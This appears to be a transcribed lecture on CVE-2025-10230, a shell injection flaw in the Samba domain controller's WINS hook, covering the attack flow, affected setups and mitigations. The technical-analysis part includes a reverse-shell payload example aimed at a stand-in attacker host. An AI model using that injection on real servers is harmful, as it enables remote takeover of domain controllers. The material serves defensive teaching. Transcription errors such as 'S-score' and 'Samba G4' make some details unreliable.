Welcome to this lecture. Today, we are focusing on CVE 2025-10230, a critical security vulnerability found in Samba's Active Directory domain controller WINS server. This vulnerability has been rated with the maximum CVSS severity score of 10-0, indicating its high-risk nature. This unauthenticated remote code execution flaw poses a significant threat as it enables attackers to gain complete system control through shell injection. In simpler terms, this means that attackers can exploit this vulnerability to execute arbitrary codes on the system without requiring any form of authentication. As a point of focus, this vulnerability is found primarily in Samba's WINS server. The WINS server is a key component of Samba's Active Directory domain controller, which is a crucial element for the interoperability between Unix, Linux, and Windows systems. This vulnerability is particularly critical because of its potential to facilitate complete system control, a high-level threat that can lead to severe consequences if not addressed promptly and effectively. In summary, the CVE 2025-10230 is a critical security vulnerability with a maximum CVSS severity score of 10-0 found in Samba's Active Directory domain controller WINS server. It is an unauthenticated remote code execution flaw that allows attackers to gain complete system control through shell injection.
Vulnerability is an unauthenticated remote code execution flaw that exists within the Samba WINS server, which can potentially affect Active Directory domain controllers. Attackers can exploit this vulnerability by manipulating the WINS hook parameter, enabling the injection of malicious shell commands. The potential damage from this vulnerability is severe, with a S-score of 10.0. The maximum severity. This is due to the ease of exploitation and the potential for a complete system compromise. To help understand this better, let's look at some key technologies involved. Firstly, we have Samba, which is an open source suite that enables Unix, Linux, and Windows interoperability. Secondly, we have the WINS server. This is the Windows Internet Name Service used for legacy NetBIOS name resolution. Lastly, we have the WINS hook. This is a configuration parameter that allows for the execution of custom scripts on WINS name changes. These components combined create the environment in which this vulnerability can be exploited. It's essential to understand how these technologies can be manipulated to inject malicious code, leading to a full system compromise.
On this slide, we're delving into the technical analysis of how the attack works. The first step involves malicious input. Here, the attacker crafts a NetBIOS name embedded with shell meta-characters like semicolon or pipe. Next, we have unsanitized processing. The WINS hook takes this input and passes it directly to the system shell without any form of validation. This leads us to shell injection, where the embedded commands execute with root privileges on the server. The final result, full compromise. The attacker gains complete control over the system and access to the AD domain. To illustrate, consider this exploitation example. Evil name, NCE/bin/sh attacker. COM4444. This malicious NetBIOS name, when processed, makes the shell execute the command NCE/bin/sh attacker. COM4444. This grants the attacker remote shell access. Importantly, this process doesn't require any authentication or user interaction. The only necessity is network access to the vulnerable service. On this slide, we're going to delve into the impact assessment and identify the affected systems associated with the type of attack we've just discussed. Firstly, let's consider what versions are affected. All versions of Samba G4 that are running as an Active Directory domain controller with WINS support enabled and a non-empty WINS hook configured are vulnerable. However, it's important to note that standalone Samba servers, member servers, servers with WINS support disabled, and those with an empty WINS hook parameter are considered safe systems not directly affected by this type of attack. Now let's move on to the real-world consequences of such an attack. The severity of the potential damage is high, starting with remote root execution. Attackers can gain system-level administrative access on the Active Directory domain controller, which gives them full control over all domain operations. An even more severe consequence is an Active Directory compromise. With complete control of the AD infrastructure, attackers can escalate privileges, move laterally across the network, and gain access to all domain resources. Lastly, ransomware and data theft are also potential outcomes. Attackers could deploy ransomware, install persistent backdoors, exfiltrate sensitive corporate data, and maintain long-term access to the system. Understanding the potential impact and the systems affected is crucial to assessing the risk level and preparing appropriate countermeasures.
Which will prevent script execution. Truly, if WINS is not required, disabling WINS support will eliminate exposure entirely. This can be done by setting the WINS support parameter to no. To check your current Samba version, you can use the command Samba version. To detect whether WINS support or WINS hook is enabled, you can use the grep command with the pattern WINS support WINS hook on your smb.conf file. Now let's talk about some long-term best practices for your systems. Network segmentation is essential, and you should restrict access to Samba at ECS from untrusted networks. Regular configuration audits are also recommended to review for deprecated or risky parameters. Applying the principle of least privilege is another best practice, which means you should avoid running services with unnecessary elevated privileges. And lastly, establish a timely security update process as part of your patch management strategy. By implementing these mitigation strategies and defense measures, you can significantly reduce the risk of a successful attack